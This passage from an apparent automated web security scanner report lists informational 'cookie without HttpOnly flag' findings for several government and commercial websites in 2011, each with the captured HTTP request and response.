Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 01:40:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-cache, must-revalidate
pragma: no-cache
content-language: en
cache-control: no-cache
content-type: text/html;charset=UTF-8
set-cookie: _sn=uoRphRmFTo3vYJBLemQjcVt09QdVGoaxoByAcCEw0vk_; Version=1; Path=/eservice_enu
Content-Length: 1403

<html OT='SiebWebMainWindow'>
<head>
<title>Michigan Department of Treasury Self Service</title>
<script language="javascript">navigator.id = "1304127646";</script></head>
<script language="javascript
...[SNIP]...

14.443. http://twitter.com/statuses/user_timeline/IDAHOgov.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /statuses/user_timeline/IDAHOgov.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /statuses/user_timeline/IDAHOgov.json?callback=twitterCallback2&count=1 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://idaho.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJSKHKYvAToHaWQiJTljOTFkZjM3NjZlNmNm%250AMjNkZTRhN2I0NGRiZTlmN2YyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--6c8c891a8675cd914d9d5999fc92789732c3f7cb

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:14:28 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00770
Content-Type: application/json; charset=utf-8
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1304165579
Set-Cookie: original_referer=VfnNLgwEGLSuRLn%2BI4bJUDQYE4KvXy2z; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJSKHKYvASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTlj%250AOTFkZjM3NjZlNmNmMjNkZTRhN2I0NGRiZTlmN2Yy--0d519c459eb1d8787cd1131396dfeb7154985001; domain=.twitter.com; path=/; HttpOnly
Expires: Sat, 30 Apr 2011 11:19:28 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 191

twitterCallback2({"request":"\/statuses\/user_timeline\/IDAHOgov.json?callback=twitterCallback2&count=1","error":"Rate limit exceeded. Clients may not make more than 150 requests per hour."})

14.444. http://va.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.gov
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: va.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 29 Apr 2011 21:07:22 GMT
Accept-Ranges: bytes
ETag: "0a1836eb16cc1:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:51:16 GMT
Set-Cookie: BIGipServerwww.va.gov_pool=1694607552.20480.0000; path=/
Set-Cookie: TSb10539=2cf38686ec503c67982e11ddf3a27c4d76d8b90ec96f367b4dbb40e3c2db820ec935e97e; Max-Age=900; Path=/
Content-Length: 26871

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!-- START: META DATA -->
<meta http-equiv="Content-Type" content="te
...[SNIP]...

14.445. http://video.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sat, 30 Apr 2011 12:28:59 GMT
Expires: Sat, 30 Apr 2011 12:28:59 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=aa53f114bad92363:TM=1304166539:LM=1304166539:S=sWGUABUiniWwp-c6; expires=Mon, 29-Apr-2013 12:28:59 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...

14.446. http://visitor.constantcontact.com/d.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://visitor.constantcontact.com
Path:   /d.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /d.jsp HTTP/1.1
Host: visitor.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:29:01 GMT
Server: Apache
X-Powered-By:
Location: http://visitor.constantcontact.com/manage/optin/ea?v=001me1prcXR2RM%3D
Content-Language: en
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Pragma: no-cache
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerProdVisitor=2856653834.20480.0000; path=/


14.447. http://wbtdcs.nara.gov/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wbtdcs.nara.gov
Path:   /dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif?&dcsdat=1304124544659&dcssip=www.archives.gov&dcsuri=/veterans/evetrecs/index.html&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=File%20Moved%20During%20the%20Redesign&WT.js=Yes&WT.jv=1.5&WT.bs=998x892&WT.fi=Yes&WT.fv=10.2 HTTP/1.1
Host: wbtdcs.nara.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/evetrecs/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 00:48:41 GMT
Server: Apache
Location: /dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif?dcsredirect=1&dcsdat=1304124544659&dcssip=www.archives.gov&dcsuri=/veterans/evetrecs/index.html&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=File%20Moved%20During%20the%20Redesign&WT.js=Yes&WT.jv=1.5&WT.bs=998x892&WT.fi=Yes&WT.fv=10.2
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1504484016.30148304; path=/
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
ETag: "3d-2b-1e369c80"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.448. http://webmail.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.aol.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: webmail.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3awebmail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3a6b79ba9d-e097-4f49-9cd3-9c7fc04f7b54&offerId=newmail-en-us-v2&seamless=novl
Server: Microsoft-IIS/7.0
Set-Cookie: Context=ver:3&sid:6b79ba9d-e097-4f49-9cd3-9c7fc04f7b54&rt:STANDARD&ckd:.mail.aol.com&ckp:%2f&ha:f8vjhjziuic8H8QMoyCqW2QqCkc%3d&; domain=.mail.aol.com; path=/
P3P: CP="CURo TAIo IVAo IVDo ONL UNI COM NAV INT DEM STA OUR"
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:29:18 GMT
Content-Length: 459

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&amp;lang=en&amp;locale=us&amp;authLe
...[SNIP]...

14.449. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wt-sdc-01.ai.org
Path:   /dcsc11w1f000000spafo59hrd_4w9q/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsc11w1f000000spafo59hrd_4w9q/dcs.gif?&dcsdat=1304126855898&dcssip=in.gov&dcsuri=/&WT.co_f=173.193.214.243-3082637536.30148309&WT.vtid=173.193.214.243-3082637536.30148309&WT.vtvs=1304126855900&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=IN.gov:%20Home&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x836&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=in.gov/&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: wt-sdc-01.ai.org
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sat, 30 Apr 2011 01:33:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcsc11w1f000000spafo59hrd_4w9q/dcs.gif?dcsredirect=1&dcsdat=1304126855898&dcssip=in.gov&dcsuri=/&WT.co_f=173.193.214.243-3082637536.30148309&WT.vtid=173.193.214.243-3082637536.30148309&WT.vtvs=1304126855900&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=IN.gov:%20Home&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x836&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=in.gov/&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1
Content-Length: 0
Set-Cookie: WEBTRENDS_ID=173.193.214.243-2509700240.30148310; expires=Tue, 27-Apr-2021 01:33:18 GMT; path=/dcsc11w1f000000spafo59hrd_4w9q
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


14.450. http://wt-sdc-01.ai.org/dcsc11w1f000000spafo59hrd_4w9q/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wt-sdc-01.ai.org
Path:   /dcsc11w1f000000spafo59hrd_4w9q/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsc11w1f000000spafo59hrd_4w9q/dcs.gif?&dcsdat=1304127024028&dcssip=in.gov&dcsuri=/core/online_services.html&dcsref=http://in.gov/&WT.co_f=173.193.214.243-3082637536.30148309&WT.vtid=173.193.214.243-3082637536.30148309&WT.vtvs=1304126855900&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=IN.gov:%20Online%20Services&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x892&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=in.gov/core/online_services.html&WT.vt_f_tlh=1304127021 HTTP/1.1
Host: wt-sdc-01.ai.org
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-3084977536.30148309; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zMDg0OTc3NTM2LjMwMTQ4MzA5AAAAAAABAAAAAgAAABFmu01sZbtNAQAAAAEAAAARZrtNbGW7TQEAAAACAAAAIzE3My4xOTMuMjE0LjI0My0zMDg0OTc3NTM2LjMwMTQ4MzA5

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:be7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zMDg0OTc3NTM2LjMwMTQ4MzA5AAAAAAABAAAAAgAAABNmu01sZbtNAQAAAAEAAAATZrtNbGW7TQEAAAACAAAAIzE3My4xOTMuMjE0LjI0My0zMDg0OTc3NTM2LjMwMTQ4MzA5; path=/; expires=Tue, 27-Apr-2021 01:29:55 GMT
Set-Cookie: WEBTRENDS_ID=; expires=Sun, 1-Jan-1995 00:00:00 GMT; path=/dcsc11w1f000000spafo59hrd_4w9q
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Sat, 30 Apr 2011 01:29:54 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.451. https://www.accesskansas.org/images/footer_images/current_year.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /images/footer_images/current_year.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer_images/current_year.gif HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Referer: https://www.accesskansas.org/dissolutions/index.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAPTCS03=755898796.38943.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:49 GMT
Server: Apache
Last-Modified: Tue, 06 Jan 2009 16:40:52 GMT
ETag: "2f1813-ef-12068d00"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: image/gif
Set-Cookie: BIGipServerSEC-01=UiP2oqvMWLFtQTBi2/r4yXnQdKxpymiHQxW5p15RiBdLKNOswst6hiCyiQ9SvAZ/FIiyd+KqkE3aTw==; path=/

GIF89a$.......................................}}}qqqiiieee...!.......,....$........I..........$(..Qp.at..p.1........Do.P N9......3.C.@.4.....!4.F...@..[.z...g...A..........J.j.'..
ZU/._[
.)wc    ..t..g
...[SNIP]...

14.452. https://www.accesskansas.org/images/footer_images/from2002.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /images/footer_images/from2002.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer_images/from2002.gif HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Referer: https://www.accesskansas.org/dissolutions/index.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAPTCS03=755898796.38943.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:49 GMT
Server: Apache
Last-Modified: Thu, 02 Feb 2006 21:37:47 GMT
ETag: "2f181a-24b-9b8600c0"
Accept-Ranges: bytes
Content-Length: 587
Connection: close
Content-Type: image/gif
Set-Cookie: BIGipServerSEC-01=RlI42CO99XZ0pkZi2/r4yXnQdKxpyuX4tX5u6oa50GehoO6ZH/bk9aewHnsaDJGTV5ffMB3VT8faNEQ=; path=/

GIF89a.......fff......fff....................................!.......,.............I..8.....!.di.h..l..-..t..E.(vo..^..b$...K`..
.V a`....R.....(
XR.$.f.4,

&.\E=.
...aM9....}......"9    .    c&..MO.".<....
...[SNIP]...

14.453. https://www.accesskansas.org/kbc/img/icons/external.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /kbc/img/icons/external.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kbc/img/icons/external.png HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Referer: https://www.accesskansas.org/dissolutions/index.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAPTCS03=755898796.38943.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:48 GMT
Server: Apache
Last-Modified: Mon, 22 Dec 2008 02:31:46 GMT
ETag: "371c91-a5-75c9a880"
Accept-Ranges: bytes
Content-Length: 165
Connection: close
Content-Type: image/png
Set-Cookie: BIGipServerSEC-01=CuIKV2PaOP4+1R5i2/r4yXnQdKxpyqfPixcLrxUNYSCyofOc40Dn2AT3Kw0YEgISMQ8Cd9qH/YjvbeM=; path=/

.PNG
.
...IHDR...
...
.......?.....PLTEf..3......f..f.......D.......tRNS........K.F...8IDAT.W%.A..@..A"..O...T.$....x.l...:r......B.......!./..Y.....5f....IEND.B`.

14.454. http://www.act.org/certificate/employers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.act.org
Path:   /certificate/employers.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /certificate/employers.html HTTP/1.1
Host: www.act.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:18:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: actpeanut_butter=A2MHa1FiAj5QeQcmCWAENFdjUTlXIFdwA2BacVEgAT4FOgJlC1BWPFI3VyMGOlYjUjpSM1U0AjlXcQVnBmJUNQs9CjADMlE0UTFTalFjDWsDNQdjUWQCPVAyB2EJawRmVzVRNldgV2ADZlo6UTIBYQUxAmoLNlY0UjVXIwY6ViNSOlIxVTYCOVdxBT4GI1RfC2wKNgNlUXVRZFMpUSYNLAM5ByJRbAI1UDcHbwl4BDRXZFEwVyxXMgM8WjFRfQFlBWQCPwshVmdSZ1cyBiNWa1JzUjpVNwIzV2kFdQYmVHMLaAogA15RZlFmUz9ROw16AyAHalElAj5QNwdlCWAEJ1ceUWxXeFdqA2lablEyAXgFYQIlCz9WdVJ7V2IGblY9UnBSYVVyAmpXMQU7BjZUOwstCh8DUlFOUURTelFiDSADMgdqUXYCU1BrBzsJPgRqVyRRcFciV00DUVoiUWUBeQVlAiILLVZuUiBXOwYwVmNSOlIiVWoCYlcgBSMGDFRhC24KJgNoUXFRaFMuUSwNLAM5ByJRbAI1UDIHbwl4BDRXYFEzVzZXMgM0WjNRagFkBWECKQs0Vig%3D; expires=Fri, 29-Apr-2011 23:18:54 GMT; path=/
Set-Cookie: actpeanut_butter=A2MHawMwBDhTegAhUjsGNg46AWlQJwcgAWIAKwZ3Aj0EO1M0UQoMZgRhUCQDP1EkVz8CY1MyBD8GIANhBGBcPQUzCjAHNgZjVjZTagAyAGYDNQdjAzYEO1MxAGZSMAZkDmwBZlBnBzABZABgBmUCYgQwUztRbAxuBGNQJAM%2FUSRXPwJhUzAEPwYgAzgEIVxXBWIKNgdhBiJWY1MpAHcAIQM5ByIDPgQzUzQAaFIjBjYOPQFgUCsHYgE%2BAGsGKgJmBGVTblF7DD0EMVA1AyZRbFd2AmpTMQQ1BjgDcwQkXHsFZgogB1oGMVZhUz8AagB3AyAHagN3BDhTNABiUjsGJQ5HATxQfwc6AWsANAZlAnsEYFN0UWUMLwQtUGUDa1E6V3UCMVN0BGwGYAM9BDRcMwUjCh8HVgYZVkNTegAzAC0DMgdqAyQEVVNoADxSZQZoDn0BIFAlBx0BUwB4BjICegRkU3NRdww0BHZQPAM1UWRXPwJyU2wEZAZxAyUEDlxpBWAKJgdsBiZWb1MuAH0AIQM5ByIDPgQzUzEAaFIjBjYOOQFjUDEHYgE2AGkGPQJnBGBTeFFuDHI%3D; expires=Fri, 29-Apr-2011 23:18:54 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12008

<!DOCTYPE html>
<html lang="en">
   <head>
<title>National Career Readiness Certificate | Employers | ACT</title>
<meta charset="UTF-8" />
<meta name="description" content="National Career Readiness Cer
...[SNIP]...

14.455. https://www.alabamainteractive.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.alabamainteractive.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcZcJfPy2b9VciC3-J_s

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:25:32 GMT
Server: Apache/1.3.41 (Unix)
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: alabamainteractive.org=1141440522.47873.0000; path=/
Content-Length: 205

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
</BODY></H
...[SNIP]...

14.456. http://www.amberalert.com/en/alerts/state/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amberalert.com
Path:   /en/alerts/state/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/alerts/state/ HTTP/1.1
Host: www.amberalert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:39 GMT
Server:
X-Powered-By: PHP/5.2.14
Vary: Cookie
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.amberalert.com
X-Pingback: http://www.amberalert.com/wordpress/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
...[SNIP]...

14.457. http://www.atg.wa.gov/BlogPost.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atg.wa.gov
Path:   /BlogPost.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BlogPost.aspx HTTP/1.1
Host: www.atg.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:30:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /AGOWebsiteError.aspx?aspxerrorpath=/BlogPost.aspx
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fAGOWebsiteError.aspx%3faspxerrorpath%3d%2fBlogPost.aspx">here</a>.</h2>
</body></html>

14.458. https://www.bbb.org/online/consumer/cks.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bbb.org
Path:   /online/consumer/cks.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online/consumer/cks.aspx HTTP/1.1
Host: www.bbb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Apr 2011 12:29:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: private
Content-Length: 7622
Set-Cookie: BBB_Cookie=3886160556.20480.0000; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   B
...[SNIP]...

14.459. http://www.blogs.va.gov/VAntage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
